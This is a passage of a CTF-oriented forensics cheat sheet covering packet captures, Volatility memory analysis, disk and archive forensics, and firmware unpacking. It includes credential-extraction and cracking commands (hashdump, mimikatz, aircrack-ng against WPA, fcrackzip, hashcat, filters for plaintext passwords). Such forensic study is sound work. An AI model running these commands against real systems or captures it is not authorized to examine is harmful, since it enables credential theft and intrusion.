│ tshark -r file.pcap -Y "ftp-data" -T fields -e data | xxd -r -p > extracted
|
|
145
|
-
├── DNS exfiltration:
|
|
146
|
-
│ ├── Subdomain encoding: base64/hex data in query names
|
|
147
|
-
│ ├── TXT records containing hidden data
|
|
148
|
-
│ └── tshark -r file.pcap -Y "dns.qry.type==16" -T fields -e dns.txt
|
|
149
|
-
├── ICMP tunneling:
|
|
150
|
-
│ ├── Data hidden in ICMP payload (ping data section)
|
|
151
|
-
│ └── tshark -r file.pcap -Y "icmp" -T fields -e data
|
|
152
|
-
├── TLS/SSL:
|
|
153
|
-
│ ├── If RSA private key available: edit → preferences → TLS → RSA keys
|
|
154
|
-
│ ├── If SSLKEYLOGFILE available: set in TLS preferences → pre-master secret log
|
|
155
|
-
│ └── Check for self-signed certs, weak ciphers, heartbleed
|
|
156
|
-
├── USB keyboard capture:
|
|
157
|
-
│ ├── tshark -r file.pcap -Y "usb.transfer_type==0x01" -T fields -e usbhid.data
|
|
158
|
-
│ └── Map HID keycodes to characters (0x04=a, 0x05=b, ...)
|
|
159
|
-
├── WiFi (802.11):
|
|
160
|
-
│ ├── aircrack-ng file.pcap -w rockyou.txt → crack WPA
|
|
161
|
-
│ └── airdecap-ng -p <password> file.pcap → decrypt traffic
|
|
162
|
-
└── Custom protocols:
|
|
163
|
-
├── Unknown ports → analyze payload patterns manually
|
|
164
|
-
└── Scapy: rdpcap('file.pcap') → programmatic analysis
|
|
165
|
-
|
|
166
|
-
═══════════════════════════════════════
|
|
167
|
-
Key Wireshark filters:
|
|
168
|
-
═══════════════════════════════════════
|
|
169
|
-
├── http.request.method == "POST" → credential submissions
|
|
170
|
-
├── ftp.request.command == "PASS" → FTP passwords
|
|
171
|
-
├── smtp contains "AUTH" → email credentials
|
|
172
|
-
├── tcp.flags.syn == 1 → connection attempts
|
|
173
|
-
├── frame contains "flag" → direct flag search
|
|
174
|
-
├── !(arp || dns || mdns) → filter noise
|
|
175
|
-
├── ip.addr == 10.0.0.1 → specific host traffic
|
|
176
|
-
└── tcp.port == 4444 → specific port (reverse shell?)
|
|
177
|
-
```
|
|
178
|
-
|
|
179
|
-
## Memory Forensics
|
|
180
|
-
|
|
181
|
-
```
|
|
182
|
-
═══════════════════════════════════════
|
|
183
|
-
Volatility 3 (preferred):
|
|
184
|
-
═══════════════════════════════════════
|
|
185
|
-
Profile detection:
|
|
186
|
-
├── vol3 -f memory.dmp banners.Banners → detect OS
|
|
187
|
-
├── vol3 -f memory.dmp windows.info → Windows version info
|
|
188
|
-
└── vol3 -f memory.dmp linux.bash → Linux bash history
|
|
189
|
-
|
|
190
|
-
Key plugins — Windows:
|
|
191
|
-
├── vol3 -f memory.dmp windows.pslist → process list
|
|
192
|
-
├── vol3 -f memory.dmp windows.pstree → process tree
|
|
193
|
-
├── vol3 -f memory.dmp windows.cmdline → command history
|
|
194
|
-
├── vol3 -f memory.dmp windows.filescan → file handles in memory
|
|
195
|
-
├── vol3 -f memory.dmp windows.dumpfiles → extract files
|
|
196
|
-
│ --pid <PID> → filter by process
|
|
197
|
-
├── vol3 -f memory.dmp windows.hashdump → SAM password hashes → crack with hashcat!
|
|
198
|
-
├── vol3 -f memory.dmp windows.netscan → network connections
|
|
199
|
-
├── vol3 -f memory.dmp windows.registry.hivelist → registry hives
|
|
200
|
-
├── vol3 -f memory.dmp windows.registry.printkey → dump registry key
|
|
201
|
-
├── vol3 -f memory.dmp windows.malfind → detect injected code
|
|
202
|
-
├── vol3 -f memory.dmp windows.envars → environment variables (FLAG!)
|
|
203
|
-
└── vol3 -f memory.dmp windows.clipboard → clipboard content
|
|
204
|
-
|
|
205
|
-
Key plugins — Linux:
|
|
206
|
-
├── vol3 -f memory.dmp linux.pslist → processes
|
|
207
|
-
├── vol3 -f memory.dmp linux.bash → bash history (FLAG!)
|
|
208
|
-
├── vol3 -f memory.dmp linux.check_syscall → rootkit detection
|
|
209
|
-
├── vol3 -f memory.dmp linux.proc.Maps → memory maps
|
|
210
|
-
└── strings memory.dmp | grep -i "flag\|password\|secret\|key"
|
|
211
|
-
|
|
212
|
-
═══════════════════════════════════════
|
|
213
|
-
Volatility 2 (older workflow):
|
|
214
|
-
═══════════════════════════════════════
|
|
215
|
-
├── vol.py -f memory.dmp imageinfo → determine profile
|
|
216
|
-
├── vol.py -f memory.dmp --profile=<P> pslist
|
|
217
|
-
├── vol.py -f memory.dmp --profile=<P> hashdump
|
|
218
|
-
├── vol.py -f memory.dmp --profile=<P> mimikatz → credential extraction
|
|
219
|
-
├── vol.py -f memory.dmp --profile=<P> memdump -p <PID> -D output/
|
|
220
|
-
└── vol.py -f memory.dmp --profile=<P> timeliner → timeline analysis
|
|
221
|
-
|
|
222
|
-
═══════════════════════════════════════
|
|
223
|
-
Quick wins in memory forensics:
|
|
224
|
-
═══════════════════════════════════════
|
|
225
|
-
├── 1. strings + grep for flag patterns FIRST (fastest!)
|
|
226
|
-
├── 2. Process list → suspicious process? → dump its memory
|
|
227
|
-
├── 3. Command history (cmdline/bash) → look for flag manipulation
|
|
228
|
-
├── 4. Environment variables → flag stored in env
|
|
229
|
-
├── 5. Network connections → hidden services, exfiltration
|
|
230
|
-
├── 6. File scan → find flag.txt, secret.txt in memory
|
|
231
|
-
├── 7. Registry → passwords, recent documents, USB history
|
|
232
|
-
└── 8. Clipboard → copied passwords/flags
|
|
233
|
-
```
|
|
234
|
-
|
|
235
|
-
## Disk Forensics
|
|
236
|
-
|
|
237
|
-
```
|
|
238
|
-
═══════════════════════════════════════
|
|
239
|
-
Disk / Filesystem Analysis:
|
|
240
|
-
═══════════════════════════════════════
|
|
241
|
-
├── fdisk -l disk.img → partition layout
|
|
242
|
-
├── mmls disk.img → partition table (sleuthkit)
|
|
243
|
-
├── mount -o loop,ro,offset=<N> disk.img /mnt → mount partition
|
|
244
|
-
│ offset = start_sector × 512
|
|
245
|
-
├── autopsy → GUI forensic suite
|
|
246
|
-
├── Sleuthkit tools:
|
|
247
|
-
│ ├── fls -r disk.img → list all files (including deleted!)
|
|
248
|
-
│ ├── icat disk.img <inode> → extract file by inode
|
|
249
|
-
│ ├── blkcat disk.img <block> → read specific block
|
|
250
|
-
│ └── tsk_recover -e disk.img output/ → recover all files
|
|
251
|
-
├── photorec disk.img → recover deleted files (by file signature)
|
|
252
|
-
├── testdisk disk.img → partition recovery + file undelete
|
|
253
|
-
└── Check slack space:
|
|
254
|
-
blkstat disk.img <block> → check if block is allocated
|
|
255
|
-
|
|
256
|
-
═══════════════════════════════════════
|
|
257
|
-
Specific filesystem features:
|
|
258
|
-
═══════════════════════════════════════
|
|
259
|
-
├── NTFS Alternate Data Streams:
|
|
260
|
-
│ ├── dir /r → list ADS on Windows
|
|
261
|
-
│ ├── getfattr -R -d /mnt/* → list ADS on mounted NTFS
|
|
262
|
-
│ └── cat /mnt/file:hidden_stream → read ADS content
|
|
263
|
-
├── ext4 extended attributes:
|
|
264
|
-
│ ├── getfattr -d <file> → list xattrs
|
|
265
|
-
│ └── Journal: jls / jcat to read deleted journal entries
|
|
266
|
-
├── FAT filesystem:
|
|
267
|
-
│ ├── No file permissions → everything is readable
|
|
268
|
-
│ ├── Deleted files: filename starts with 0xE5
|
|
269
|
-
│ └── Volume label may contain clues
|
|
270
|
-
└── Filesystem timeline:
|
|
271
|
-
fls -m "/" -r disk.img | mactime -b - > timeline.csv
|
|
272
|
-
→ chronological view of file access/modification/creation
|
|
273
|
-
```
|
|
274
|
-
|
|
275
|
-
## Archive Analysis
|
|
276
|
-
|
|
277
|
-
```
|
|
278
|
-
Archive forensics:
|
|
279
|
-
├── ZIP:
|
|
280
|
-
│ ├── unzip -l archive.zip → list contents without extracting
|
|
281
|
-
│ ├── zipinfo archive.zip → detailed structure
|
|
282
|
-
│ ├── Known-plaintext attack: pkcrack → crack if partial content known
|
|
283
|
-
│ ├── fcrackzip -b -c 'aA1!' -l 1-8 archive.zip → brute force
|
|
284
|
-
│ ├── john --format=zip hash.txt → John the Ripper (zip2john first)
|
|
285
|
-
│ └── Zip slip: path traversal via ../../ in filenames
|
|
286
|
-
├── RAR:
|
|
287
|
-
│ ├── rar2john archive.rar > hash.txt → extract hash
|
|
288
|
-
│ └── hashcat -m 13000 hash.txt wordlist → crack
|
|
289
|
-
├── 7z:
|
|
290
|
-
│ └── 7z l -slt archive.7z → detailed listing
|
|
291
|
-
├── tar/gz/bz2:
|
|
292
|
-
│ ├── tar tf archive.tar → list contents
|
|
293
|
-
│ └── Check timestamp/permissions for clues
|
|
294
|
-
└── Nested archives:
|
|
295
|
-
Multiple compression layers (zip inside gz inside tar)
|
|
296
|
-
→ automate: write script to recursively extract until flag found
|
|
297
|
-
```
|
|
298
|
-
|
|
299
|
-
## Firmware Analysis
|
|
300
|
-
|
|
301
|
-
```
|
|
302
|
-
├── binwalk -e firmware.bin → extract filesystem
|
|
303
|
-
├── firmware-mod-kit → unpack/repack firmware
|
|
304
|
-
├── Common filesystems: squashfs, jffs2, cramfs, yaffs2
|
|
305
|
-
│ unsquashfs extracted/squashfs → mount squashfs
|
|
306
|
-
├── Look for:
|
|
307
|
-
│ ├── /etc/shadow or /etc/passwd → hardcoded credentials
|
|
308
|
-
│ ├── /etc/config/* → configuration files with secrets
|
|
309
|
-
│ ├── *.key, *.pem → private keys
|
|
310
|
-
│ ├── Web interface source code → vulnerabilities
|
|
311
|
-
│ └── Compiled binaries → reverse engineer
|
|
312
|
-
└── Emulation: qemu or firmadyne → run firmware for dynamic analysis
|
|
313
|
-
```
|